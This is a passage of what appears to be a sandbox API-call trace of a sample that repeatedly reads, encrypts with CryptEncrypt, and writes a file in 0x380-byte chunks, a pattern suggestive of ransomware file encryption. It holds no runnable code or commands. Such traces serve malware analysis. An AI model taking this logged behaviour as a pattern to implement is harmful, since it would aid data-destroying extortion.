lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.682] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.682] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.682] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.682] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.682] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.682] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.682] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.683] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.683] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.683] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.683] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.683] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.683] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.683] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.683] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.683] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.683] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.683] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.683] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.684] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.684] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.684] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.684] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.684] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.684] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.684] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.684] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.684] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.684] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.684] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.685] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.685] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.685] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.685] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.685] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.685] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.685] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.685] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.685] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.685] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.685] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.685] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.686] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.686] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.686] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.686] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.686] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.686] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.686] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.686] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.686] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.686] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.686] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.687] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.687] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.687] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.688] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.688] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.688] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.688] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.688] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.688] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.688] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.688] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.688] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.688] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.688] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.688] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.688] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.689] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.689] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.689] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.689] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.689] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.689] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.689] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.689] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.689] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.689] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.689] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.689] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.690] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.690] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.690] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.690] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.690] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.690] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.690] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.690] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.690] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.690] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.690] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.690] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.691] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.691] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.691] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.691] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.691] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.691] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.691] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.691] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.691] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.691] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, 